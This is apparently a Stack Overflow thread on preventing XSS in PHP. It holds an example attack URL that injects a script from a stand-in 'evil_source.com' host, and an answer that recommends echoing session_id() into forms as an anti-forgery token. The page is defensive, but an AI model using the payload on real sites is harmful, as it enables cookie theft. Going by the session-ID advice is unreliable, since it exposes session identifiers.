-2

I have found on the web many function/class to prevent XSS attacks. Now, what's best PHP function/class for 100% prevent XSS attacks for input POST/GET form value?

Dharman
  • 30,962
  • 25
  • 85
  • 135
user27133
  • 487
  • 4
  • 16
  • 31

1 Answers1

3

XSS (cross-site scripting) comes in many forms, one of which is allowing a user to manipulate your website content by making it mix user input with the generated HTML.

Example:

http://www.exemple.com/setname.php?name=<script src=http://evil_source.com/browser_hijack.js></script>

If your site prints $_GET['name'] somewhere, you will be injecting this evil JavaScript in your HTML that will allow a hacker to interact with it in name of the user, steal cookies etc.

In this case, the best way to avoid such thing from happening is filtering all user-originated information that is displayed in your website.

The usual way of doing that is using processing user-originated content with htmlspecialchars() or htmlentities().

Another aspect of XSS that is often forgotten is cross-site posting.

Every server-side script that processes sensitive information or commands coming from the user should check that the user really posted it, and not some other origin messing with URLs or arbitrary POST requests.

This is done by using a post key that only your site knows. I suppose you can safely use the session_id() for that. This is an information that only your server and the user's browser know, and no one else.

What you do do is in every <form>, include this:

<input type="hidden" name="postkey" value="<?php echo session_id(); ?>">

And in the script that handles this form, make sure $_REQUEST['postkey'] == session_id().

This will prevent other sites from inducing user actions on your site by using arbitrary generated formularies or URLs.

Havenard
  • 27,022
  • 5
  • 36
  • 62
  • 1
    I use it with my PDO queries all days long and I can confirm that this function really prevents XSS 100% for sure. IIRC it's certified by TÜV Rheinland as well as Anti XSS function. – hakre Jul 21 '14 at 20:12
  • 4
    *UTF-8* called, and it wants its characters back. Seriously, don't use `htmlentities()` for, well, basically anything. Instead, the proper API is [`htmlspecialchars()`](http://php.net/htmlspecialchars) – ircmaxell Jul 21 '14 at 20:13
  • 1
    @hakre I'm not sure everyone understands that you are being sarcastic. :-D – Brad Jul 21 '14 at 20:13
  • See also: http://stackoverflow.com/questions/3623236/htmlspecialchars-vs-htmlentities-when-concerned-with-xss – Brad Jul 21 '14 at 20:14
  • There are two kind of people in the internet: Those who can deal with sarcasm online, and those who not. The OP can deal with it, I'm perfectly sure :) – hakre Jul 21 '14 at 20:15
  • @Brad Note the most upvoted answer on that thing is... not entirely correct – PeeHaa Jul 21 '14 at 20:16
  • No answer can be entirely correct if the question is about the one function that secures it all. Never. Ever. But Stackoverflow is not a good venue for answering questions that aren't easy answerable (yes / no kind of answers), at least to some degree. – hakre Jul 21 '14 at 20:17
  • @PeeHaa Just adding more to the conversation, not making a claim either way... I use `htmlspecialchars()` myself, but some folks will argue this one all day. – Brad Jul 21 '14 at 20:17